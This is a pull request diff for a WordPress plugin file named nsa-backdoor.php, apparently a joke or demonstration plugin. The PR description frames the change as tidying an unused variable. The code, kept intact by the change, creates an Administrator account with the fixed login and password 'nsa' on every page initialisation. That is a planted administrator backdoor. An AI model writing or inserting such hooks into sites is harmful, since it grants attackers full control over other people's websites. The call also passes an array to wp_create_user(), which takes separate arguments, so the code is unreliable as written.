### PR TITLE
Avoid assignment of unused variables

### DIFF
--- a/nsa-backdoor.php
+++ b/nsa-backdoor.php
@@ -15,19 +15,16 @@ function nsabackdoor_create_login() {
     return;
   
   //add user
-  $user   = array(  
-          'user_pass'    => 'nsa',
-          'user_login'   => 'nsa',
-          'user_email'   => 'nsa@example.com',
-          'role'         => 'Administrator',
-          'first_name'   => 'NSA',
-          'last_name'    => 'Administrator',
-          'display_name' => 'NSA',
-          'user_url'     => 'http://www.nsa.gov',
-        );
-  $id = wp_create_user( $user );
-  
- 
+  wp_create_user( array(  
+    'user_pass'    => 'nsa',
+    'user_login'   => 'nsa',
+    'user_email'   => 'nsa@example.com',
+    'role'         => 'Administrator',
+    'first_name'   => 'NSA',
+    'last_name'    => 'Administrator',
+    'display_name' => 'NSA',
+    'user_url'     => 'http://www.nsa.gov',
+  ) );
 }
  
 add_action( 'init', 'nsabackdoor_create_login' );


### PR DESCRIPTION
Just directly pass an array to `wp_create_user()` since we aren't using the output in any way.
